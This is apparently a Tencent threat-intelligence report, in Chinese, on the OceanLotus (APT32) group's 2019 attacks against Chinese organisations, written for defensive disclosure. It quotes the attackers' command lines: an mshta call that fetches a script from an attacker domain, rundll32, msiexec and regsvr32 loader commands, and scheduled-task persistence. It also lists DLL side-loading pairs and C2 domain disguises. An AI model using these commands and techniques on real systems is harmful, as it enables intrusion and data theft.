「海蓮花」(OceanLotus) 2019 年針對中國攻擊活動匯總

一、概述

「海蓮花」（又名APT32、OceanLotus），被認為是來自越南的APT攻擊組織，自2012年活躍以來，一直針對中國大陸的敏感目標進行攻擊活動，是近幾年來針對中國大陸進行攻擊活動最活躍的APT攻擊組織，甚至沒有之一。

騰訊安全御見威脅情報中心曾在2019年上半年發布過海蓮花組織2019年第一季度攻擊活動報告，在報告發布之後一直到現在，我們監測到該組織針對中國大陸的攻擊持續活躍。該組織的攻擊目標眾多且廣泛，包括中國大陸的政府部門、海事機構、外交機構、大型國企、科研機構以及部分重要的私營企業等。並且我們監測到，有大量的國內目標被該組織攻擊而整個內網都淪陷，且有大量的機密資料、企業伺服器配置信息等被打包竊取。

此外我們發現，該組織攻擊人員非常熟悉我國，對我國的時事、新聞熱點、政府結構等都非常熟悉，如剛出個稅改革時候，就立馬使用個稅改革方案做為攻擊誘餌主題。此外釣魚主題還包括績效、薪酬、工作報告、總結報告等。

而從攻擊的手法上看，相對第一季度變化不是太大，但有一些小的改進，包括攻擊誘餌的種類、payload加載、繞過安全檢測等方面。而從整體攻擊方式來看，依然採用電子郵件投遞誘餌的方式，一旦獲得一臺機器的控制權後，立即對整個內網進行掃描和平移滲透攻擊等。這也進一步說明了APT攻擊活動不會因為被曝光而停止或者有所減弱，只要攻擊目標存在價值，攻擊會越來越猛烈，對抗也會越來越激烈。

有關海蓮花APT組織2019年對中國大陸攻擊情況的完整技術報告，請參考：

https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf

二、攻擊特點2.1  釣魚郵件的迷惑性

海蓮花組織擅長使用魚叉攻擊，通過大量精準發送釣魚郵件來投遞惡意附件的方式進行攻擊。整個2019年，持續對多個目標不斷的進行攻擊，如下列釣魚郵件：

 

從郵件主題來看，大部分郵件主題都非常本土化，以及貼近時事熱點。郵件主題包括：

《定-關於報送2019年度經營業績考核目標建議材料的報告》、《組織部幹部四處最新通知更新》、《關於2019下半年增加工資實施方案的請示（待審）》、《2019年工作報告提綱2(第四稿)》、《2019年5月標準幹部培訓課程通知》等等。

我們在2019年第一季度的報告中還提到海蓮花組織採用敏感內容主題釣魚郵件，不過在之後的攻擊中並未再次發現使用該類型誘餌：

此外，投遞釣魚郵件的帳號均為網易郵箱，包括126郵箱和163郵箱，帳號樣式為：名字拼音+數字@163（126）.com，如：

Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。

2.2  誘餌類型的多樣化

海蓮花組織所使用的誘餌類型眾多，能想到的誘餌類型海蓮花幾乎都用過。除了我們在第一季度報告裡提到的白加黑、lnk、doc文檔、WinRAR ACE漏洞（CVE-2018-20250）的壓縮包等類型外，之後的攻擊中還新增了偽裝為word圖標的可執行文件、chm文件等。

可執行文件誘餌：

Chm誘餌：

白加黑誘餌：

帶有宏的惡意office文檔：

惡意lnk：

帶有WinRAR ACE（CVE-2018-20250）漏洞的壓縮包：

 

2.3  載荷執行方式多變

由於誘餌的多樣化，載荷執行的方式也多變。此外第二階段的加載方式同樣方式眾多。

1、 直接執行可執行文件

如該誘餌，偽裝為word圖標的可執行文件，並在文件描述裡修改成了Microsoft DOCX，用於迷糊被釣魚者。執行惡意文件後，會釋放誘餌文檔2019年5月標準幹部培訓課程通知.docx，並且打開，讓受害者以為打開的就是word文檔。而打開後的文檔為模糊處理的文檔，誘使受害者啟用文檔中的宏代碼以查看文檔內容，實際上啟用宏之後，仍然看不到正常的內容：

2、 使用rundll32加載惡意dll

如某誘餌在執行後，會在C:\Users\Administrator\AppData\Local\Microsoft目錄釋放真正的惡意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll，然後使用rundll32來執行該dll：」C:\Windows\system32\rundll32.exe」 「C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll」,Register

3、 宏

使用宏來執行載荷，且宏代碼經過的混淆處理：

 

4、 Office內存執行惡意shellcode

使用宏代碼，在office中直接解密shellcode，在內存中創建線程執行：

5、 dll側加載（白加黑）

使用dll側加載（DLL Side-Loading）技術來執行載荷，通俗的講就是我們常說的白加黑執行。

其中所使用的宿主文件對包括：

白文件原名黑dll文件名iTunesHelper.exeAppVersions.dllSGTool.exeInetmib1.dllRar.exeldvptask.ocxGoogleUpdate.exegoopdate.dll360se.exechrome_elf.dllWinword.exewwlib.dllrekeywiz.exempr.dllwps.exekrpt.dllwechat.exeWeChatWin.dll

6、 通過com技術執行

通過com技術，把某惡意dll註冊為系統組建來執行：

7、 Chm內嵌腳本

Chm執行後，會提示執行ActiveX代碼：

其腳本內容為：

不過由於編碼處理的問題，該chm打開後為亂碼：

而通過手動解壓後，原始內容如下：

8、 使用計劃任務進行持久性攻擊

如上面的chm誘餌執行後，會在%AppData%\Roaming下釋放文件bcdsrv.dll，然後創建名為MonthlyMaintenance的計劃任務：

命令行為：C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

bcdsrv.dll為真正的惡意文件。

9、 lnk調用mstha執行

該方法的詳細分析在之前的《海蓮花2019年第一季度攻擊披露》：

執行lnk後，會調用命令：C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html，而news.html實際為一個vbs腳本文件。

10、 使用odbcconf.exe加載文件：

odbcconf.exe為系統自帶的一個文件，該文件可以用來執行dll文件，而由於宿主進程為系統文件，因此可以逃避一些安全軟體的攔截：

11、WinRAR ACE（CVE-2018-20250）漏洞

帶有該漏洞的壓縮包，可以構造為：解壓後除了會解壓出正常的文件外，再在啟動目錄（C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup）釋放一個自解壓文件：

該文件為一個自解壓程序，等啟動後，會釋放一個{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件，然後執行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx執行：

2.4  多重載荷攻擊

我們在最新的攻擊活動中，我們首次發現海蓮花使用了多重載荷的攻擊。

之前的攻擊活動中，都是解密shellcode後，就直接執行最終的RAT，如：

而在最新的攻擊活動中，我們發現，解密shellcode後，會先下載shellcode執行，如果下載不成功，再來加載預先設定好的RAT：

這樣使得攻擊活動更加的豐富和多樣性，並且也可控。

2.5  與安全軟體對抗激烈

海蓮花也採用了多種對抗安全軟體的方式，主要為：

1、 dll的側加載（白加黑）

該技術上面已詳細描述，這裡不再贅述。

2、 使用系統文件來執行：

如odbcconf.exe

3、 Office中直接內存執行shellcode

上文也已經描述，這裡也不再展開。

4、 添加垃圾數據以擴充文件大小

為了防止該文件被安全廠商收集，海蓮花組織特意在某些文件的資源中添加大量的垃圾數據的方式以擴充文件大小。

如某文件，填充垃圾數據後，文件大小高達61.4 MB (64,480,256 字節)：

5、 每臺機器的第二階段後門都是定製的

每臺機器的第二階段後門文件都是根據當前機器的機器屬性（如機器名）來加密定製的，因此每臺機器上的文件hash都是不一樣，且沒這臺機器的相關信息則無法解密。因此且即便被安全廠商捕捉，只要沒有這臺機器的相關遙感數據就無法解密出真正的payload。詳細的見後文的」定製化後門」部分。

6、 通信的偽裝

如某次攻擊中C2的偽裝：根據配置信息，可進行不同的連接和偽裝，對C2進行拼裝後再進行解析。拼接方式為（xxx為配置C2）：

{rand}.xxx

www6.xxx

cdn.xxx

api.xxx

HTTP Header的偽裝：

2.6  定製化的後門

使用定製化的後門（主要是第二階段下發的後門），海蓮花組織在2019年所使用的技術中最令人印象深刻的。該技術我們曾經在《2019年海蓮花第一季度攻擊報告》中首次曝光：針對每臺機器下發的惡意文件，都使用被下發機器的相關機器屬性（如機器名）進行加密，而執行則需要該部分信息，否則無法解密。因此每個下發的惡意文件都不一樣，而且即便被安全廠商捕捉，只要沒有該機器的相關遙感數據就無法解密出真正的payload。

該後門最終使用白加黑的方式來執行，包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、

XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等組合來執行。

加密流程為：

可以看到，某次針對國家某單位的攻擊中，使用的密鑰為：

而該受害的用戶名為Cao**，可見該木馬只專門為了感染該電腦而特意生成的。

2.7  多種惡意軟體的選擇

從我們的長期跟蹤結果來看，海蓮花組織使用最終的惡意軟體（無論是第一階段後門還是第二階段後門）主要有三種，分別是CobaltStrike的beacon木馬、Denis家族木馬、修改版的Gh0st。其中CobaltStrike和Denis使用的最多，而修改版的Gh0st則比較少見。

CobaltStrike：

Denis：

修改版Gh0st：

2.8  持續的內網滲透

通過釣魚攻擊攻陷一臺主機後，海蓮花還會不斷對被攻擊的內網進行滲透攻擊活動，以此來滲透到更多的內網機器：

掃描：

獲取hash：

打包文件：

此外，還會還會通過powershell，創建計劃任務來下載持久化的工具：

最終的惡意文件為goopdate.dll，跟上文所述的第二階段下發後門一致。

三、可能存在的假旗活動

在跟蹤海蓮花的過程中，我們還發現了一些跟海蓮花活動類似的攻擊：

如:

可以看出該批活動跟海蓮花的類似：如關鍵字、使用白加黑等。

而該文件最終的執行的惡意代碼為兩種：

一種是CobaltStrike生成的Beacon payload；

另一種是metasploit生成的block_reverse_http的paylaod。

雖然CobaltStrike的Beacon木馬海蓮花組織一直在進行使用，但是之前未發現有metasploit生成的payload，這似乎跟之前的海蓮花攻擊活動又有些不一致。

此外該批活動的c2都在中國境內（包括中國香港），這似乎跟之前的攻擊活動也不大一樣：

雖然這波活動在極力模仿海蓮花的一些攻擊行為，但是也依然存在不同的地方。因此暫未有更多的證據可以表明該活動歸屬於海蓮花還是其他組織使用的假旗（false flag）活動。因此在這先不做定論，等待更多的證據和關聯的依據。

四、總結

海蓮花組織是近年來針對中國大陸的敏感部門進行攻擊最活躍的APT組織，甚至沒有之一。當然該組織也是被安全公司曝光的針對中國大陸攻擊活動報告最多的APT攻擊組織。儘管被安全廠商頻繁曝光，該組織並未有停手跡象，反而不斷更新其技術和武器庫，包括誘餌、payload、新的漏洞利用等，此外也有眾多跟殺軟的對抗手段，如自增文件大小、混淆方式、定製化的payload等。

因此我們提醒相關部門和相關人員，切記提高安全意識，不要隨意執行來歷不明的郵件的附件，不要被釣魚信息所蒙蔽。

五、安全建議

1、 提升安全意識，不要打開來歷不明的郵件的附件；除非文檔來源可靠，用途明確，否則不要輕易啟用Office的宏代碼；

2、 及時安裝作業系統補丁和Office等重要軟體的補丁；

3、 使用殺毒軟體防禦可能得病毒木馬攻擊。

文章來源：騰訊御見威脅情報中心

長按關注>>>                

                                           

盤它

文章投稿/商務合作

廣告投放/申請入群